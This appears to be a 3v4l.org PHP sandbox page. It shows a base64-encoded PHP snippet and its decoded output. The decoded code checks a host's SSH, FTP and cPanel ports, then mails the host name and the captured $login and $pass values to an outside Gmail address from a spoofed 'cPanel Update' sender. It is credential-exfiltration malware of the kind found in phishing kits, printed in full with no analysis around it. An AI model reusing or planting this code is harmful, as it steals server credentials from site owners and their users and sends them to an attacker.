3v4l.org

run code in 150+ php & hhvm versions
Bugs & Features
<?php echo base64_decode('JGRvbWFpbiA9ICRfU0VSVkVSWydIVFRQX0hPU1QnXTsKJHAyMSA9IDIxOwokcDIyID0gMjI7CiRwMjA4MiA9IDIwODI7CiRjcDIyID0gZnNvY2tvcGVuKCRkb21haW4sJHAyMiwkZXJybm8sJGVycnN0ciwxMCk7CiRjcDIxID0gZnNvY2tvcGVuKCRkb21haW4sJHAyMSwkZXJybm8sJGVycnN0ciwxMCk7CiRjcDIwODIgPSBmc29ja29wZW4oJGRvbWFpbiwkcDIwODIsJGVycm5vLCRlcnJzdHIsMTApOwoKCmlmKCEkY3AyMikKeyRhMT0iRXJyb3IiO30KZWxzZQp7JGExPSJTdWNjZXNzIjtmY2xvc2UoJGNwMjIpO30KCmlmKCEkY3AyMSkKeyRhMj0iRXJyb3IiO30KZWxzZQp7JGEyPSJTdWNjZXNzIjtmY2xvc2UoJGNwMjEpO30KCmlmKCEkY3AyMDgyKQp7JGEzPSJFcnJvciI7fQplbHNlCnskYTM9IlN1Y2Nlc3MiO2ZjbG9zZSgkY3AyMDgyKTt9CgoKJHBzbiA9IgotLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tXG4KY1BhbmVsIFVwZGF0ZSBJbmZvIFsgUG93ZXJlZCBieSBQZXRlcnNvbiBdIFxuCi0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS1cbgpIb3N0IDogJGRvbWFpblxuClVzZXIgOiAkbG9naW5cbgpQYXNzIDogJHBhc3NcbgotLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tXG4KQWNjZXB0IFBvcnQgXG4KU1NIIDogUG9ydCAkYTFcbgpGVFAgOiBQb3J0ICRhMlxuCmNQYW5lbCA6IFBvcnQgJGEzXG4KLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLVxuCu+/vSAyMDEyIFBvd2VyZWQgYnkgUGV0ZXJzb25cbgotLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tXG4iOwokdG8gPSAicGV0ZXJzb25yZWlnbnNAZ21haWwuY29tIjsKJHJlY2lwID0gInBldGVyc29ucmVpZ25zQGdtYWlsLmNvbSI7CiRzdWJqZWN0ID0gImNQYW5lbCBBY2Nlc1MgVXBkYXRlIjsKJGhlYWRlcnMgPSAiRnJvbTogdXBkYXRlPG5ld3NAY3AtdXBkYXRlLmluZm8+IjsKbWFpbCgkdG8sJHN1YmplY3QsJHBzbiwkaGVhZGVycyk7Cm1haWwoJHJlY2lwLCRzdWJqZWN0LCRwc24sJGhlYWRlcnMpOw==');
Output for 4.3.0 - 5.6.28, hhvm-3.12.0, 7.0.0 - 7.1.0
$domain = $_SERVER['HTTP_HOST']; $p21 = 21; $p22 = 22; $p2082 = 2082; $cp22 = fsockopen($domain,$p22,$errno,$errstr,10); $cp21 = fsockopen($domain,$p21,$errno,$errstr,10); $cp2082 = fsockopen($domain,$p2082,$errno,$errstr,10); if(!$cp22) {$a1="Error";} else {$a1="Success";fclose($cp22);} if(!$cp21) {$a2="Error";} else {$a2="Success";fclose($cp21);} if(!$cp2082) {$a3="Error";} else {$a3="Success";fclose($cp2082);} $psn =" -------------------------------------------------------------------------\n cPanel Update Info [ Powered by Peterson ] \n -------------------------------------------------------------------------\n Host : $domain\n User : $login\n Pass : $pass\n -------------------------------------------------------------------------\n Accept Port \n SSH : Port $a1\n FTP : Port $a2\n cPanel : Port $a3\n -------------------------------------------------------------------------\n � 2012 Powered by Peterson\n -------------------------------------------------------------------------\n"; $to = "petersonreigns@gmail.com"; $recip = "petersonreigns@gmail.com"; $subject = "cPanel AccesS Update"; $headers = "From: update<news@cp-update.info>"; mail($to,$subject,$psn,$headers); mail($recip,$subject,$psn,$headers);
Output for hhvm-3.10.0

Process exited with code 153.